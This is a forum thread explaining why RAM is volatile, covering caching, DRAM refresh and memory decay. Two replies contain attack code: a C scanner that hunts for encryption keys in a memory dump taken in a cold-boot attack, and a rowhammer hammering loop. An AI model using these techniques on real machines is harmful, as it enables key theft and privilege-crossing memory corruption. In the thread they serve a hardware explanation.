In a similar vein, why can we not use the technology of RAM to prolong the life-cycle of an SSD?

  • Lemvi@lemmy.sdf.org · +58 / -2 · 1 year ago

    Writing to an SSD wears it out, but data saved to an SSD is persistent, meaning it isn’t lost when the SSD loses power. Writing to RAM doesn’t damage it, and it is also much quicker. However, data in RAM is not persistent, meaning it is all lost as soon as the RAM loses power. RAM is also a lot more expensive per gigabyte than SSD storage.

    RAM is already used to avoid writing to (or reading from) the SSD or HDD whenever possible; the concept is called “caching”.
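    A minimal sketch of the caching idea in C, with every name and size invented for illustration (this is not any real OS’s page cache): a tiny write-back cache keeps recently used blocks in RAM, serves repeated reads and writes from memory, and only touches the simulated “SSD” on a miss or when a dirty block is evicted.

    ```c
    /* Toy write-back block cache: a hypothetical sketch, not a real OS's
     * page cache.  The "SSD" is just an in-memory array with counters so
     * the program is self-contained and runnable. */
    #include <stdio.h>
    #include <string.h>

    #define BLOCK_SIZE  512
    #define NUM_BLOCKS  16     /* size of the simulated drive           */
    #define CACHE_SLOTS 4      /* how many blocks we keep cached in RAM */

    static char ssd[NUM_BLOCKS][BLOCK_SIZE]; /* stand-in for the real drive    */
    static int  ssd_reads, ssd_writes;       /* how often we actually touch it */

    struct slot { int block; int dirty; char data[BLOCK_SIZE]; };
    static struct slot cache[CACHE_SLOTS];

    /* Find (or load) the cache slot for a block; the conflicting slot is
     * evicted, and written back to the "SSD" only if it is dirty. */
    static struct slot *get_slot(int block)
    {
        struct slot *s = &cache[block % CACHE_SLOTS];
        if (s->block != block) {
            if (s->dirty) {                          /* write-back on eviction */
                memcpy(ssd[s->block], s->data, BLOCK_SIZE);
                ssd_writes++;
            }
            memcpy(s->data, ssd[block], BLOCK_SIZE); /* miss: read from "SSD"  */
            ssd_reads++;
            s->block = block;
            s->dirty = 0;
        }
        return s;
    }

    static void cached_write(int block, const char *buf)
    {
        struct slot *s = get_slot(block);
        memcpy(s->data, buf, BLOCK_SIZE);
        s->dirty = 1;            /* defer the SSD write until eviction/flush */
    }

    static void cached_read(int block, char *buf)
    {
        memcpy(buf, get_slot(block)->data, BLOCK_SIZE);
    }

    int main(void)
    {
        for (int i = 0; i < CACHE_SLOTS; i++) cache[i].block = -1;

        char buf[BLOCK_SIZE] = "hello";
        for (int i = 0; i < 1000; i++)  /* 1000 writes to the same block...   */
            cached_write(3, buf);
        cached_read(3, buf);            /* ...and a read, all served from RAM */

        /* Prints "SSD reads: 1, SSD writes: 0": one miss, no writes yet. */
        printf("SSD reads: %d, SSD writes: %d\n", ssd_reads, ssd_writes);
        return 0;
    }
    ```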

    • grahamsz@kbin.social · +29 / -3 · 1 year ago

      Even if it’s powered, RAM will lose its data within something on the order of a tenth of a second. RAM doesn’t just require power, it requires that your computer constantly read and rewrite it, so roughly every 64 ms your computer has to go through every gigabyte of RAM and write it back.
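      To put numbers on that 64 ms figure, here is a back-of-envelope calculation in C using typical DDR4 values as assumptions: the spec wants every row refreshed within a 64 ms window, and the controller spreads that work over 8192 refresh commands, i.e. one roughly every 7.8 µs.

      ```c
      /* Back-of-envelope refresh timing, using typical DDR4 numbers as assumptions. */
      #include <stdio.h>

      int main(void)
      {
          double retention_window_ms = 64.0; /* every row must be refreshed within this */
          int    refresh_commands    = 8192; /* REF commands spread across that window  */

          double trefi_us = retention_window_ms * 1000.0 / refresh_commands;
          printf("average interval between refresh commands (tREFI): %.2f us\n",
                 trefi_us); /* about 7.81 us */
          return 0;
      }
      ```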

        • grahamsz@kbin.social · +4 · 1 year ago

          Some very early systems did do it at the kernel level, but yeah, you are correct. Though I’d also consider the DRAM chips to be part of the computer, and DRAM refresh makes up a good part of your phone’s battery consumption in standby.

        • rickdgray@lemmy.world · +2 · 1 year ago

          Dynamic RAM tracks bits by using a capacitor for each bit. A capacitor’s charge bleeds away, so you have to top it off every so often, and the way you do that is simply to write the same data back again: the chip reads and rewrites its own contents on every refresh. The alternative is static RAM, which doesn’t use a capacitor and is just a clever arrangement of transistors, so no refresh is needed. It isn’t typically used as main memory outside of special requirements, though, because the extra transistors make it significantly more expensive. So the refresh strategy is the better choice for consumer hardware, and DRAM has been dominant for decades.
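          A toy model of that read-and-rewrite loop in C (the decay constant and threshold are made-up numbers, purely for illustration): the cell’s capacitor voltage decays exponentially, a sense threshold decides whether it still reads as a 1, and a refresh just writes the sensed value back at full strength.

          ```c
          /* Toy DRAM cell: exponential charge leakage plus periodic refresh.
           * All constants are invented for illustration, not real device values.
           * Build with: cc cell.c -lm */
          #include <stdio.h>
          #include <math.h>

          #define VDD       1.0   /* a freshly written '1' is full charge */
          #define THRESHOLD 0.5   /* read as 1 if the voltage is >= 0.5   */
          #define TAU_MS    200.0 /* made-up leakage time constant        */

          int main(void)
          {
              double v = VDD;            /* the cell currently stores a 1        */
              int refresh_interval = 64; /* refresh period in ms, as in the spec */

              for (int ms = 1; ms <= 320; ms++) {
                  v *= exp(-1.0 / TAU_MS);        /* charge leaks away each ms   */

                  if (ms % refresh_interval == 0) {
                      double sensed = v;               /* voltage before refresh */
                      int bit = (sensed >= THRESHOLD); /* read the cell...       */
                      v = bit ? VDD : 0.0;             /* ...write it back fully */
                      printf("t=%3d ms: sensed %.2f -> bit %d, rewritten\n",
                             ms, sensed, bit);
                  }
              }
              /* Without the refresh, v would fall below THRESHOLD after about
               * TAU_MS * ln(2) = 139 ms and the stored 1 would read back as 0. */
              return 0;
          }
          ```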

        • al177@lemmy.sdf.org · +2 · edited · 1 year ago

          If you ever have the chance to use an old Apple II computer, run a text-mode program, wait until the owner is looking the other way, and turn the power off and back on quickly.

          For about a second, before you hear the loud BOOP and the screen clears, you’ll see whatever was on the screen just before you powered it off, but a few characters will be corrupted. Try it again and wait half a second longer than before: more characters will be corrupted.

          For that brief second you’re looking at the contents of the video RAM, before the ROM (what we’d now call the BIOS; Apple just called it the ROM) clears it and puts up the familiar text banner. The longer the power stays off, the more the contents of those RAM cells decay, and any bit flip shows up as a different character at the corresponding spot on the screen.

          On a side note, there was an article in the early '80s in Circuit Cellar by Steve Ciarcia showing how you could make a rudimentary digital camera by prying the top off a DRAM chip (some were ceramic with metal lids, or just metal cans) and adding a CCTV camera lens at the right distance. Light can deplete the charge in DRAM cells even faster, and by writing all 1s to the memory, exposing it to light, and reading back the contents, you could get a black and white image of whatever’s shining on the chip.

      • CaptPretentious@lemmy.world · +3 · 1 year ago

        If I remember right, the decay of information in RAM is slower than that. This is an old memory, but I recall someone on TechTV talking about how, if you were fast enough, you could remove a module from one machine, put it in another, and, if done right, potentially get the information off it.

        • MaxHardwood@lemmy.ca · +2 · 1 year ago

          It’s possible, and can be done at home. You need to literally freeze the RAM very quickly (typically with CO2) and transfer it to the new system. Then you dump the contents of the stick and hopefully find an encryption key.
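          A crude sketch in C of the “hopefully find an encryption key” step, assuming the stick’s contents have already been dumped to a raw file (the dump.bin name, window size, and entropy threshold are all placeholder assumptions; real cold-boot tooling looks for specific structures such as AES key schedules): scan the dump and flag high-entropy regions as candidate key material.

          ```c
          /* Crude candidate-key scan over a raw memory dump ("dump.bin" is a
           * placeholder).  Keys look like random bytes, so we flag windows with
           * unusually high byte entropy.  Build with: cc scan.c -lm */
          #include <stdio.h>
          #include <math.h>

          #define WINDOW      64   /* bytes examined at a time              */
          #define MIN_ENTROPY 5.5  /* bits/byte; true random data is near 8 */

          static double entropy(const unsigned char *buf, int len)
          {
              int counts[256] = {0};
              for (int i = 0; i < len; i++) counts[buf[i]]++;

              double h = 0.0;
              for (int b = 0; b < 256; b++) {
                  if (!counts[b]) continue;
                  double p = (double)counts[b] / len;
                  h -= p * log2(p);
              }
              return h;
          }

          int main(void)
          {
              FILE *f = fopen("dump.bin", "rb"); /* raw dump of the frozen module */
              if (!f) { perror("dump.bin"); return 1; }

              unsigned char buf[WINDOW];
              long offset = 0;
              while (fread(buf, 1, WINDOW, f) == WINDOW) {
                  double h = entropy(buf, WINDOW);
                  if (h > MIN_ENTROPY)   /* looks random: possible key material */
                      printf("candidate at offset 0x%lx (%.2f bits/byte)\n",
                             offset, h);
                  offset += WINDOW;
              }
              fclose(f);
              return 0;
          }
          ```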

        • grahamsz@kbin.social · +1 · 1 year ago

          From what I’ve read it’s temperature dependent, and at room temperature some DRAM cells might take as long as 10 seconds to decay. The 64 ms refresh is a super conservative call, because it’s really bad when random bits go missing from memory. The decay is faster at high temperatures, but some DRAM controllers might actually adjust the refresh rate based on temperature.

      • Julian@lemm.ee · +10 · 1 year ago

        Doesn’t the RAM do that itself? Otherwise reading/writing all that data would waste tons of CPU time.

        • grahamsz@kbin.social · +23 · 1 year ago

          Yes, it’s been the job of the DRAM controller for almost the entire history of computing. But that’s still a part of the computer, and if it stops working then your RAM will go blank in a fraction of a second.

        • thepianistfroggollum@lemmynsfw.com · +6 · 1 year ago

          It’s been a very long time since my computer engineering course, and we didn’t cover this topic specifically, but I highly doubt it’s a full dump and reload. What likely happens is that each RAM address has a TTL flag or some other way for the CPU to know when to rewrite the data, and it does so as needed.

          Plus, the bus between the CPU and RAM is ridiculously fast. Your PC could dump and reload all of its RAM in the time it takes you to blink. And with multiple cores, the task could be allocated to a single core or divided up among all of them.

          • PeterPoopshit@lemmy.world · +1 · 1 year ago

            At least on older x86 motherboards, there used to be a dedicated DRAM refresh cycle: a timer channel would fire roughly every 15 microseconds and make the refresh logic issue a bus hold request, then refresh a row of RAM. The bus hold means the CPU can’t access the RAM while it happens (it can still run stuff from its cache), but at least you aren’t wasting as much CPU time on DRAM refresh this way.
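            A back-of-envelope version of that overhead in C, with classic PC/XT figures taken as rough assumptions (a refresh request about every 15 µs, each stealing a few bus cycles of roughly 210 ns): refresh only costs a few percent of the bus.

            ```c
            /* Rough estimate of DRAM refresh overhead on an early PC-class machine.
             * The intervals and cycle counts are approximate assumptions. */
            #include <stdio.h>

            int main(void)
            {
                double refresh_interval_us = 15.1;  /* one refresh request per ~15 us */
                double bus_cycle_ns        = 210.0; /* ~4.77 MHz bus clock            */
                double cycles_per_refresh  = 5.0;   /* bus cycles stolen each time    */

                double stolen_us = cycles_per_refresh * bus_cycle_ns / 1000.0;
                double overhead  = 100.0 * stolen_us / refresh_interval_us;
                printf("refresh steals roughly %.1f%% of the bus\n", overhead); /* ~7% */
                return 0;
            }
            ```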

          • al177@lemmy.sdf.org · +2 · 1 year ago

            Modern RAM just needs to be told to refresh; the device itself steps through the refresh process. But the whole array gets refreshed, there’s no LRU scheme to track which bank or row was last accessed.

            Starting with DDR3 it’s not so easy. Density is so high that reading or writing one row disturbs cells in adjacent rows. Target row refresh counters this: an access to a row can be followed by an extra refresh of its neighbouring rows. Flaws in this process in early DDR3 systems were at the heart of the rowhammer exploits, where repeated accesses to a memory location could flip bits in physically adjacent memory, even memory the attacker has no privilege to touch. IIRC DDR4 pulled this process into the RAM’s built-in refresh circuitry, so it’s transparent to the memory controller.
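            For reference, the core rowhammer access pattern is tiny. This is only a sketch of the inner loop (finding two addresses that really map to rows adjacent to a victim row means reverse-engineering the controller’s address mapping, which is assumed to have been done elsewhere, and in-DRAM mitigations make the basic pattern far less effective on newer parts):

            ```c
            /* Classic rowhammer inner loop: repeatedly activate two "aggressor"
             * rows, flushing the cache each time so every read really reaches DRAM.
             * x86-specific (clflush).  The demo addresses below almost certainly do
             * NOT sit next to a victim row; picking real aggressors is the hard part. */
            #include <stdint.h>
            #include <stdlib.h>
            #include <stdio.h>
            #include <emmintrin.h>              /* _mm_clflush */

            static void hammer(volatile uint8_t *aggr1, volatile uint8_t *aggr2,
                               long iterations)
            {
                for (long i = 0; i < iterations; i++) {
                    (void)*aggr1;               /* activate aggressor row 1            */
                    (void)*aggr2;               /* activate aggressor row 2            */
                    _mm_clflush((const void *)aggr1); /* evict so next read hits DRAM  */
                    _mm_clflush((const void *)aggr2);
                }
                /* Afterwards the victim row in between is checked for flipped bits. */
            }

            int main(void)
            {
                size_t len = 1 << 20;
                uint8_t *buf = calloc(1, len);
                if (!buf) return 1;
                hammer(buf, buf + len / 2, 100000); /* placeholder aggressor addresses */
                puts("done hammering (demo addresses only)");
                free(buf);
                return 0;
            }
            ```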